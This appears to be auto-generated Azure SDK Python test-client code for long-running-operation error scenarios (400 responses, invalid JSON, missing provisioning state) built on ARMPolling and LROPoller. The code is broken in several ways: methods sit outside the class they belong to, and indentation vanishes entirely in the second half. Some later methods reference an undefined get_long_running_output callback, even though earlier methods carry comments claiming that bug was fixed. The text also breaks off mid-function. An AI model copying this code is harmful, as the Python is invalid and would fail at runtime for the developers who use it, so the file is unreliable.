    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._post_async_relative_retry_succeeded_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # Declared return type is None; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
class LROSADsOperations(object):  # pylint: disable=too-many-public-methods
    """LROSADsOperations operations.

    Operation group exercising long-running-operation "sad path" scenarios
    (non-retryable errors, invalid payloads, bad status codes).

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
@distributed_trace
def begin_put_non_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
    """Long running put request, service returns a 400 to the initial request.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }

            # response body for status code(s): 200, 201
            response.json() == {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._put_non_retry400_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialization callback for the poller: an empty final body maps to None.
        # Was previously referenced but never defined, raising NameError at poll completion.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_non_retry201_creating400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
    """Long running put request, service returns a Product with 'ProvisioningState' = 'Creating' and
    201 response code.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }

            # response body for status code(s): 200, 201
            response.json() == {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._put_non_retry201_creating400_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialization callback for the poller: an empty final body maps to None.
        # Was previously referenced but never defined, raising NameError at poll completion.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_non_retry201_creating400_invalid_json(
    self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
    """Long running put request, service returns a Product with 'ProvisioningState' = 'Creating' and
    201 response code.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }

            # response body for status code(s): 200, 201
            response.json() == {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._put_non_retry201_creating400_invalid_json_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialization callback for the poller: an empty final body maps to None.
        # Was previously referenced but never defined, raising NameError at poll completion.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
    """Long running put request, service returns a 200 with ProvisioningState=’Creating’. Poll the
    endpoint indicated in the Azure-AsyncOperation header for operation status.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }

            # response body for status code(s): 200
            response.json() == {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._put_async_relative_retry400_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialization callback for the poller: an empty final body maps to None.
        # Was previously referenced but never defined, raising NameError at poll completion.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_non_retry400(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 400 with an error body.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._delete_non_retry400_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # No body to deserialize for a delete; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_non_retry400(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 202 with a location header.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._delete202_non_retry400_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # No body to deserialize for a delete; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry400(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 202 to the initial request. Poll the endpoint
    indicated in the Azure-AsyncOperation header for operation status.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._delete_async_relative_retry400_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # No body to deserialize for a delete; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_non_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
    """Long running post request, service returns a 400 with no error body.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._post_non_retry400_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # Declared return type is None; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_non_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 with a location header.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_non_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_error201_no_provisioning_state_payload(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request with no payload.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_error201_no_provisioning_state_payload_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_no_status(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
